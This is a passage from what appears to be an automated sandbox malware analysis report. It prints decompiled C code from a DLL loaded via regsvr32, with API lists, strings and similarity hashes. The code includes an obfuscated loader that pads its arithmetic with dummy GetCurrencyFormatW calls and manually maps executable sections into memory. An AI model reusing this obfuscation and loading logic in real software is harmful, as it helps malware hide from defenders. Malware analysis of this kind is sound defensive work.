								GetCurrencyFormatW(0, 0x11d4, _t218, 0, L"xadqsavcbdfewescGADW", _t256);
								_v12 = _v12 + 4;
								continue;
							}
						}
						goto L18;
					}
					goto L26;
				}
				return 1;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10002C19
GetCurrencyFormatW.KERNEL32 ref: 10002C32
GetCurrencyFormatW.KERNEL32 ref: 10002C4F
GetCurrencyFormatW.KERNEL32 ref: 10002C86
GetCurrencyFormatW.KERNEL32 ref: 10002CA2
GetCurrencyFormatW.KERNEL32 ref: 10002FD5
IsBadHugeReadPtr.KERNEL32(000022B9,-00000014), ref: 10002FE6

Strings

xadqsavcbdfewescGADW, xrefs: 10002BF8, 10002C23, 10002C40, 10002C7D, 10002C93, 10002CC3, 10002CEC, 10002D24, 10002D3E, 10002D73, 10002DA4, 10002DDA, 10002DF3, 10002E19, 10002E36, 10002E68, 10002E8F, 10002EAC, 10002EE0, 10002F09, 10002F3A, 10002F7A, 10002F8B, 10002FB9, 10002FCA
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002BE9, 10002BFF, 10002C04, 10002C2A, 10002C47, 10002C83, 10002C9A, 10002CCA, 10002CF3, 10002D2A, 10002D45, 10002D7A, 10002DAB, 10002DE4, 10002DFA, 10002E24, 10002E3D, 10002E6F, 10002E9A, 10002EB3, 10002EE7, 10002F10, 10002F41, 10002F80, 10002F92, 10002FBF, 10002FD1

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$HugeRead
String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 393575760-3161301136
Opcode ID: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction ID: ead797fee4320dd8a6b32923dbdec08024b9b474de8a2ec407594d38246e10a8
Opcode Fuzzy Hash: d104fe54fbad355bcebe88f005ab9aa9ac17f58dad5190f15827009be6e713bf
Instruction Fuzzy Hash: 15D15971508205AFE304DF60CD96F6BBBE8EB8A788F11581DF6459B292C732E914CF25

Uniqueness

Uniqueness Score: -1.00%

Function 10001E51 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 314
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10001E51(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				signed int _v4;
				int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr* _v20;
				int _t93;
				signed int _t94;
				signed int _t108;
				intOrPtr* _t109;
				void* _t113;
				void* _t147;
				short* _t160;
				signed int _t187;
				short* _t194;
				void* _t195;
				void* _t196;
				void* _t197;

				_t195 =  &_v20;
				_t194 = L"xadqsavcbdfewescGADW";
				_t160 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 =  *((intOrPtr*)(_a16 + 4));
				_v4 =  *(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a16 + 0x14) & 0x0000ffff;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc * 0x28 + _v4;
				_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 + _v4 +  *_a16 + 0x18;
				_v8 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff) <= 0) {
					L11:
					return 1;
				}
				_v20 = _v4 + 0x10;
				do {
					_t93 = 0;
					if( *_v20 != 0) {
						_t94 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						if(E10001E20(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _a8, _t94 *  *0x100440d0 +  *_v20 +  *((intOrPtr*)(_v20 + 4))) == 0) {
							L13:
							return 0;
						}
						_t108 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9);
						_t109 = _v20;
						_t113 =  *((intOrPtr*)(_a16 + 0x1c))( *((intOrPtr*)(_t109 - 4)) + _v12, _t108 *  *0x100440d8 +  *_t109, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 4,  *((intOrPtr*)(_a16 + 0x34)));
						_t196 = _t195 + 0x14;
						if(_t113 == 0) {
							goto L13;
						}
						_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 +  *((intOrPtr*)(_v20 - 4)) + _v12;
						memcpy(_v16,  *((intOrPtr*)(_v20 + 4)) + _a4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440cc +  *_v20);
						_t195 = _t196 + 0xc;
						_v4 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d8 - 0x00000001 & _v16;
						 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4;
						L9:
						_t93 = 0;
						goto L10;
					}
					_t187 =  *((intOrPtr*)(_a12 + 0x38));
					_v4 = _t187;
					if(_t187 <= 0) {
						goto L10;
					}
					_t147 =  *((intOrPtr*)(_a16 + 0x1c))(GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440e0 +  *((intOrPtr*)(_v20 - 4)) + _v12, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + _v4, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 + 0x1000, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440dc + 4,  *((intOrPtr*)(_a16 + 0x34)));
					_t197 = _t195 + 0x14;
					if(_t147 == 0) {
						goto L13;
					}
					_v16 = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 +  *((intOrPtr*)(_v20 - 4)) + _v12;
					 *(_v20 - 8) = GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d0 - 0x00000001 & _v16;
					memset(_v16, 0, GetCurrencyFormatW(0, 0x11d4, _t160, 0, _t194, 0x22b9) *  *0x100440d4 + _v4);
					_t195 = _t197 + 0xc;
					goto L9;
					L10:
					_v8 = _v8 + 1;
					_v20 = _v20 + 0x28;
				} while (_v8 < GetCurrencyFormatW(_t93, 0x11d4, _t160, _t93, _t194, 0x22b9) *  *0x100440d0 + ( *( *_a16 + 6) & 0x0000ffff));
				goto L11;
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 10001E84
GetCurrencyFormatW.KERNEL32 ref: 10001EAE
GetCurrencyFormatW.KERNEL32 ref: 10001ECE
GetCurrencyFormatW.KERNEL32 ref: 10001EF9
GetCurrencyFormatW.KERNEL32 ref: 10001F53
GetCurrencyFormatW.KERNEL32 ref: 10001F6C
GetCurrencyFormatW.KERNEL32 ref: 10001F87
GetCurrencyFormatW.KERNEL32 ref: 10001FA1
GetCurrencyFormatW.KERNEL32 ref: 10001FD4
GetCurrencyFormatW.KERNEL32 ref: 10001FF8
GetCurrencyFormatW.KERNEL32 ref: 10002019
memset.MSVCRT ref: 1000202D
GetCurrencyFormatW.KERNEL32 ref: 10002045
GetCurrencyFormatW.KERNEL32 ref: 10002066
GetCurrencyFormatW.KERNEL32 ref: 10002096
GetCurrencyFormatW.KERNEL32 ref: 100020AF
GetCurrencyFormatW.KERNEL32 ref: 100020CA
GetCurrencyFormatW.KERNEL32 ref: 10002102
GetCurrencyFormatW.KERNEL32 ref: 10002126
memcpy.MSVCRT ref: 10002144
GetCurrencyFormatW.KERNEL32 ref: 100021A0

Strings

xadqsavcbdfewescGADW, xrefs: 10001E6A, 10001E6F, 10001EA3, 10001EC3, 10001EEA, 10001F4E, 10001F65, 10001F80, 10001F9A, 10001FCD, 10001FED, 1000200A, 10002040, 1000205F, 1000208F, 100020A8, 100020C3, 100020FB, 1000211B, 10002152, 10002167, 1000219B
(, xrefs: 10002191
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10001E5C, 10001E72, 10001E77, 10001EA6, 10001EC6, 10001EF2, 10001F50, 10001F68, 10001F83, 10001F9D, 10001FD0, 10001FF0, 1000200D, 10002042, 10002062, 10002092, 100020AB, 100020C6, 100020FE, 1000211E, 10002155, 1000216A, 1000219D

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat$memcpymemset
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 2888895459-2712681272
Opcode ID: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction ID: 346e2bfed80208adbbea8c92dee40ae63694b643ed2e5d5183bbf84c561662e4
Opcode Fuzzy Hash: 3e584bf575076d2f861363e2cb4f4e983203ccea50c86de04f033ec7f5290706
Instruction Fuzzy Hash: B1A159B1644344BFE208DB95CD86F2BBBECEB8AB48F011419F745DB2D1C671E9108B65

Uniqueness

Uniqueness Score: -1.00%

Function 10005EFE Relevance: 45.7, APIs: 21, Strings: 5, Instructions: 229
registrylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E10005EFE(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t73;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				struct HINSTANCE__* _t81;
				signed int _t92;
				signed int _t94;
				unsigned int _t97;
				void* _t113;
				unsigned int _t115;
				signed short _t123;
				unsigned int _t124;
				_Unknown_base(*)()* _t131;
				signed short _t133;
				unsigned int _t134;
				intOrPtr _t143;
				void* _t144;
				int _t145;
				int _t146;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				int _t172;
				signed int _t176;
				void* _t177;
				CHAR* _t181;
				void* _t183;
				void* _t184;

				_t167 = __edx;
				_t184 = _t183 - 0x118;
				_t181 = _t184 - 4;
				_t73 =  *0x10045580; // 0x771f5646
				_t181[0x118] = _t73 ^ _t181;
				_push(0x58);
				E1001FBC4(E10032F92, __ebx, __edi, __esi);
				_t169 = 0;
				 *(_t181 - 0x40) = _t181[0x124];
				 *(_t181 - 0x14) = 0;
				 *(_t181 - 0x10) = 0;
				_t78 = GetModuleHandleA("kernel32.dll");
				 *(_t181 - 0x18) = _t78;
				_t79 = GetProcAddress(_t78, "GetUserDefaultUILanguage");
				if(_t79 == 0) {
					if(GetVersion() >= 0) {
						_t81 = GetModuleHandleA("ntdll.dll");
						if(_t81 != 0) {
							 *(_t181 - 0x14) = 0;
							EnumResourceLanguagesA(_t81, 0x10, 1, E100056C3, _t181 - 0x14);
							if( *(_t181 - 0x14) != 0) {
								_t97 =  *(_t181 - 0x14) & 0x0000ffff;
								_t145 = _t97 & 0x3ff;
								 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t97 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t145);
								 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t145);
								 *(_t181 - 0x10) = 2;
							}
						}
					} else {
						 *(_t181 - 0x18) = 0;
						if(RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019, _t181 - 0x18) == 0) {
							 *(_t181 - 0x44) = 0x10;
							if(RegQueryValueExA( *(_t181 - 0x18), 0, 0, _t181 - 0x20,  &(_t181[0x108]), _t181 - 0x44) == 0 &&  *(_t181 - 0x20) == 1) {
								_t113 = E10021022( &(_t181[0x108]), "%x", _t181 - 0x1c);
								_t184 = _t184 + 0xc;
								if(_t113 == 1) {
									 *(_t181 - 0x14) =  *(_t181 - 0x1c) & 0x0000ffff;
									_t115 =  *(_t181 - 0x1c) & 0x0000ffff;
									_t146 = _t115 & 0x3ff;
									 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t115 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t146);
									 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale(_t146);
									 *(_t181 - 0x10) = 2;
								}
							}
							RegCloseKey( *(_t181 - 0x18));
						}
					}
				} else {
					_t123 =  *_t79() & 0x0000ffff;
					 *(_t181 - 0x14) = _t123;
					_t124 = _t123 & 0x0000ffff;
					_t164 = _t124 & 0x3ff;
					 *(_t181 - 0x1c) = _t164;
					 *((intOrPtr*)(_t181 - 0x34)) = ConvertDefaultLocale(_t124 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t164);
					 *((intOrPtr*)(_t181 - 0x30)) = ConvertDefaultLocale( *(_t181 - 0x1c));
					 *(_t181 - 0x10) = 2;
					_t131 = GetProcAddress( *(_t181 - 0x18), "GetSystemDefaultUILanguage");
					if(_t131 != 0) {
						_t133 =  *_t131() & 0x0000ffff;
						 *(_t181 - 0x14) = _t133;
						_t134 = _t133 & 0x0000ffff;
						_t172 = _t134 & 0x3ff;
						 *((intOrPtr*)(_t181 - 0x2c)) = ConvertDefaultLocale(_t134 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t172);
						 *((intOrPtr*)(_t181 - 0x28)) = ConvertDefaultLocale(_t172);
						 *(_t181 - 0x10) = 4;
					}
					_t169 = 0;
				}
				 *(_t181 - 0x10) =  &(1[ *(_t181 - 0x10)]);
				_t181[ *(_t181 - 0x10) * 4 - 0x34] = 0x800;
				_t181[0x105] = 0;
				_t181[0x104] = 0;
				if(GetModuleFileNameA(0x10000000, _t181, 0x105) != _t169) {
					_t143 = 0x20;
					E10020F40(_t169, _t181 - 0x64, _t169, _t143);
					 *((intOrPtr*)(_t181 - 0x64)) = _t143;
					 *(_t181 - 0x5c) = _t181;
					 *((intOrPtr*)(_t181 - 0x50)) = 0x3e8;
					 *(_t181 - 0x48) = 0x10000000;
					 *((intOrPtr*)(_t181 - 0x60)) = 0x88;
					E100056D9(_t181 - 0x3c, 0x10000000, 0xffffffff);
					 *(_t181 - 4) = _t169;
					if(E10005789(_t181 - 0x3c, _t181 - 0x64) != 0) {
						E100057BF(_t181 - 0x3c);
					}
					_t176 = 0;
					if( *(_t181 - 0x10) <= _t169) {
						L23:
						 *(_t181 - 4) =  *(_t181 - 4) | 0xffffffff;
						E10005DB0(_t181 - 0x3c);
						_t92 = _t169;
						goto L24;
					} else {
						while(1) {
							_t94 = E10005CE3(_t143,  *(_t181 - 0x40), _t167, _t169, _t181[_t176 * 4 - 0x34]);
							if(_t94 != _t169) {
								break;
							}
							_t176 =  &(1[_t176]);
							if(_t176 <  *(_t181 - 0x10)) {
								continue;
							}
							goto L23;
						}
						_t169 = _t94;
						goto L23;
					}
				} else {
					_t92 = 0;
					L24:
					 *[fs:0x0] =  *((intOrPtr*)(_t181 - 0xc));
					_pop(_t170);
					_pop(_t177);
					_pop(_t144);
					return E1001FBB5(_t92, _t144, _t181[0x118] ^ _t181, _t167, _t170, _t177);
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 10005F1D
GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 10005F3E
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10005F4F
ConvertDefaultLocale.KERNEL32(?), ref: 10005F85
ConvertDefaultLocale.KERNEL32(?), ref: 10005F8D
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10005FA1
ConvertDefaultLocale.KERNEL32(?), ref: 10005FC5
ConvertDefaultLocale.KERNEL32(000003FF), ref: 10005FCB
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10006004
GetVersion.KERNEL32 ref: 10006019
RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 1000603E
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 10006063
_sscanf.LIBCMT ref: 10006083
ConvertDefaultLocale.KERNEL32(?), ref: 100060B8
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 100060BE
RegCloseKey.ADVAPI32(?), ref: 100060CD
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100060DD
EnumResourceLanguagesA.KERNEL32 ref: 100060F8
ConvertDefaultLocale.KERNEL32(?), ref: 10006129
ConvertDefaultLocale.KERNEL32(76C84EE0), ref: 1000612F
_memset.LIBCMT ref: 10006149

Strings

GetSystemDefaultUILanguage, xrefs: 10005F8F
kernel32.dll, xrefs: 10005F30
ntdll.dll, xrefs: 100060D8
GetUserDefaultUILanguage, xrefs: 10005F46
Control Panel\Desktop\ResourceLocale, xrefs: 10006031

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$CloseEnumFileH_prolog3LanguagesNameOpenQueryResourceValueVersion_memset_sscanf
String ID: Control Panel\Desktop\ResourceLocale$GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 434808117-483790700
Opcode ID: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction ID: 371a1abfdbbeaae06af34074570e4e6b8653269969333db2bd091179cc2368d9
Opcode Fuzzy Hash: 368d1d919a1a639eff12c1c674209e918f78b3616a3622e04850d242e1eb4b18
Instruction Fuzzy Hash: 22818FB5D002299FEB11DFA5DC84AFFBAF5EB48351F20452AE944E7280D7789A44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 10002482 Relevance: 42.3, APIs: 21, Strings: 3, Instructions: 327
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 97%

			E10002482(intOrPtr* _a4) {
				int _v4;
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				void* __ebx;
				signed int _t117;
				signed int _t125;
				signed int _t150;
				signed int _t159;
				signed int _t160;
				signed int _t171;
				short* _t178;
				short* _t222;
				void* _t223;

				_t223 =  &_v40;
				_t178 = L"xadqsavcbdfewescGADW";
				_t222 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v24 =  *(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 * 0xf8 +  *_a4 + 0x14) & 0x0000ffff;
				_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v24;
				_v40 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v24 +  *_a4 + 0x18;
				if(( *0x10046ab4 & 0x00000001) == 0) {
					 *0x10046ab4 =  *0x10046ab4 | 0x00000001;
					 *0x10046ab0 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0;
				}
				_v20 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 +  *0x10046ab0 |  *(_v40 + 8);
				_v16 = E10001DB6(_v20, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d4 +  *((intOrPtr*)(_a4 + 0x3c)));
				_v24 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x28 + _v40);
				_t117 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
				_v40 = _v40 + 0x28;
				_v8 =  *(_v40 + 0x24);
				_v12 = _v24 + _t117 *  *0x100440d8;
				_v4 = 0;
				_v32 = 1;
				if(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff) <= 1) {
					L13:
					_v4 = 1;
					_t125 = E1000227A( &_v20, _a4);
					asm("sbb eax, eax");
					return  ~( ~_t125);
				} else {
					do {
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 +  *(_v40 + 8);
						_v24 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24;
						_v36 = E10001DB6(GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 +  *0x10046ab0 | _v24,  *((intOrPtr*)(_a4 + 0x3c)));
						_v28 = E100021CE(_a4, GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 * 0x28 + _v40);
						_v28 = _v28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0;
						if(_v16 == _v36 || _v12 + _v20 > GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + _v36) {
							if(( *(_v40 + 0x24) & GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
								L10:
								_t150 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 - 0x02000001 & ( *(_v40 + 0x24) | _v8);
								L11:
								_v8 = _t150;
								_v12 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440e0 - _v20 + _v28 + _v24;
								goto L12;
							}
							_t159 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9);
							_t160 = _v8;
							if((_t160 & _t159 *  *0x100440e0 + 0x02000000) == 0) {
								goto L10;
							}
							_t150 = _t160 |  *(_v40 + 0x24);
							goto L11;
						} else {
							if(E1000227A(_t223 + 0x28 + GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d8 * 0x14, _a4) == 0) {
								return 0;
							}
							_v20 = _v24;
							_v16 = _v36;
							_t171 = GetCurrencyFormatW(0, 0x11d4, _t222, 0, L"xadqsavcbdfewescGADW", 0x22b9);
							_t178 = L"xadqsavcbdfewescGADW";
							_v12 = _t171 *  *0x100440e0 + _v28;
							_v8 =  *(_v40 + 0x24);
						}
						L12:
						_v32 = _v32 + 1;
						_v40 = _v40 + 0x28;
					} while (_v32 < GetCurrencyFormatW(0, 0x11d4, _t222, 0, _t178, 0x22b9) *  *0x100440d0 + ( *( *_a4 + 6) & 0x0000ffff));
					goto L13;
				}
			}

APIs

GetCurrencyFormatW.KERNEL32 ref: 100024AA
GetCurrencyFormatW.KERNEL32 ref: 100024D4
GetCurrencyFormatW.KERNEL32 ref: 100024F4
GetCurrencyFormatW.KERNEL32 ref: 1000252B

Part of subcall function 10001DB6: GetCurrencyFormatW.KERNEL32 ref: 10001DCE

GetCurrencyFormatW.KERNEL32 ref: 10002545
GetCurrencyFormatW.KERNEL32 ref: 1000256B
GetCurrencyFormatW.KERNEL32 ref: 10002597
GetCurrencyFormatW.KERNEL32 ref: 100025C3
GetCurrencyFormatW.KERNEL32 ref: 100025FE
GetCurrencyFormatW.KERNEL32 ref: 10002628
GetCurrencyFormatW.KERNEL32 ref: 10002648
GetCurrencyFormatW.KERNEL32 ref: 1000267E

Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 100021FF
Part of subcall function 100021CE: GetCurrencyFormatW.KERNEL32 ref: 10002222

GetCurrencyFormatW.KERNEL32 ref: 100026AA
GetCurrencyFormatW.KERNEL32 ref: 100026D7
GetCurrencyFormatW.KERNEL32 ref: 100026FE
GetCurrencyFormatW.KERNEL32 ref: 10002740
GetCurrencyFormatW.KERNEL32 ref: 10002772
GetCurrencyFormatW.KERNEL32 ref: 10002795
GetCurrencyFormatW.KERNEL32 ref: 100027C3
GetCurrencyFormatW.KERNEL32 ref: 100027EE
GetCurrencyFormatW.KERNEL32 ref: 1000281C

Strings

xadqsavcbdfewescGADW, xrefs: 10002494, 10002499, 100024C9, 100024E9, 10002524, 1000253E, 10002560, 1000258C, 100025B8, 100025E3, 10002621, 1000263D, 10002673, 1000269F, 100026D0, 100026F7, 10002729, 1000274D, 1000276B, 1000278E, 100027BC, 100027E3, 10002815
(, xrefs: 1000280B
eofgerDSQWzbxberfjXFSqwaKLIOrtyZD, xrefs: 10002486, 1000249C, 100024A1, 100024CC, 100024EC, 10002527, 10002541, 10002563, 1000258F, 100025BB, 100025EB, 10002624, 10002640, 10002676, 100026A2, 100026D3, 100026FA, 10002730, 1000276E, 10002791, 100027BF, 100027E6, 10002818

Memory Dump Source

Source File: 00000002.00000002.259635846.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.259568974.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259703759.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259750364.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259817552.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259866776.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259911607.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259942125.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.259964401.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.260018017.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: CurrencyFormat
String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
API String ID: 3383288267-2712681272
Opcode ID: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction ID: aca6d6cc97a103aa38e8287a4bdca31c23581297dae163bc22dbee5c6a0af23b
Opcode Fuzzy Hash: e752a4a7a8a42b0df952e79aab9ae48840a3d500f4805a10681732b9bc365d18
Instruction Fuzzy Hash: 5DB16975648354BFE308CB50CD86F1BBBE8EB8AB48F11180EF7449A2D1C771E9508B65

Uniqueness

Uniqueness Score: -1.00%

Function 10026012 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109
libraryloadermemoryCOMMONLIBRARYCODE

Download Yara Rule

